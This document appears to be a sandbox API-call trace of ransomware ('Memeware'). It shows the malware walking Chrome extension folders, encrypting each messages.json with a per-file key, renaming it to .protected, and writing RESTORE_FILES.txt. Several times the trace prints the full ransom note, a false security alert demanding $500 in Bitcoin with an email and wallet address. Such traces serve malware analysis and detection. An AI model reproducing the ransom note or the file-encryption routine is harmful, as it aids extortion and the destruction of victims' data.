[0080.435] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419") returned 145 [0080.435] lstrcmpW (lpString1="es_419", lpString2=".") returned 1 [0080.435] lstrcmpW (lpString1="es_419", lpString2="..") returned 1 [0080.435] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\*") returned 147 [0080.435] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.436] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.436] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.436] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.436] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.436] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.436] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\.") returned 147 [0080.436] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.436] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.436] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.436] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.436] lstrcmpiW (lpString1="..", 
lpString2="Program Files (x86)") returned -1 [0080.436] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.436] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.436] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\..") returned 148 [0080.436] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.436] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.436] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.436] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.436] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.436] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.436] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.436] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.437] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\messages.json") returned 159 [0080.437] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.437] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.437] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.437] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.437] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.437] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\messages.json") returned 159 [0080.437] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.437] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\messages.json") returned 159 [0080.437] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.437] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\messages.json") returned 159 [0080.437] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.437] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xe3, lpOverlapped=0x0) returned 1 [0080.438] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff1d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.439] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, 
lpNumberOfBytesWritten=0x295d914*=0xe3, lpOverlapped=0x0) returned 1 [0080.439] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.439] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.439] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.439] CloseHandle (hObject=0x168) returned 1 [0080.439] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\messages.json.protected") returned 169 [0080.439] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\messages.json.protected")) returned 1 [0080.440] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.440] FindClose (in: 
hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.440] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\RESTORE_FILES.txt") returned 163 [0080.440] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.441] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.441] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.442] lstrlenA (lpString="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") returned 684 [0080.442] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.442] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.442] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0080.442] CloseHandle (hObject=0x164) returned 1 [0080.442] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.442] lstrcmpiW (lpString1="et", lpString2="Windows") returned -1 [0080.442] lstrcmpiW (lpString1="et", lpString2="Program Files") returned -1 [0080.442] lstrcmpiW (lpString1="et", lpString2="Program Files (x86)") returned -1 [0080.442] lstrcmpiW (lpString1="et", lpString2="$Recycle.bin") returned 1 [0080.442] lstrcmpiW (lpString1="et", lpString2="System Volume Information") returned -1 [0080.442] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et") returned 141 [0080.442] lstrcmpW (lpString1="et", lpString2=".") returned 1 [0080.442] lstrcmpW (lpString1="et", lpString2="..") returned 1 [0080.442] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\*") returned 143 [0080.443] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.443] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.443] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.443] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.443] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.443] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.443] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" 
| out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\.") returned 143 [0080.443] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.443] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.443] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.443] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.443] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.443] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.443] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.443] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\..") returned 144 [0080.443] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.443] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.443] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.443] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.443] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.443] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.443] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.443] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.443] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\messages.json") 
returned 155 [0080.444] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.444] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.444] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.444] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.444] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.444] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\messages.json") returned 155 [0080.444] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.444] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\messages.json") returned 155 [0080.444] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.444] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\messages.json") returned 155 [0080.444] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.444] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, 
nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xd4, lpOverlapped=0x0) returned 1 [0080.445] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff2c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.445] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xd4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xd4, lpOverlapped=0x0) returned 1 [0080.446] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.446] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.446] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.446] CloseHandle (hObject=0x168) returned 1 [0080.446] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\messages.json.protected") returned 165 [0080.446] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\messages.json.protected")) returned 1 [0080.447] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.447] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.447] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\RESTORE_FILES.txt") returned 159 [0080.447] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.447] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.447] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.449] lstrlenA (lpString="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") returned 684 [0080.449] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.449] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.449] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0080.449] CloseHandle (hObject=0x164) returned 1 [0080.449] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.449] lstrcmpiW (lpString1="eu", lpString2="Windows") returned -1 [0080.449] lstrcmpiW (lpString1="eu", lpString2="Program Files") returned -1 [0080.449] lstrcmpiW (lpString1="eu", lpString2="Program Files (x86)") returned -1 [0080.449] lstrcmpiW (lpString1="eu", lpString2="$Recycle.bin") returned 1 [0080.449] lstrcmpiW (lpString1="eu", lpString2="System Volume Information") returned -1 [0080.449] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu") returned 141 [0080.449] lstrcmpW (lpString1="eu", lpString2=".") returned 1 [0080.449] lstrcmpW (lpString1="eu", lpString2="..") returned 1 [0080.449] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\*") returned 143 [0080.449] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.459] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.459] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.459] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.459] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.459] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.459] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" 
| out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\.") returned 143 [0080.459] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.459] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.459] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.459] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.459] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.459] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.459] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.459] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\..") returned 144 